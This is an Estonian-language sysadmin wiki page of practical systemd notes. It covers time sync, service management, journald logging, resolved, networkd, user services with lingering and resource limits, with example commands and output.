Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

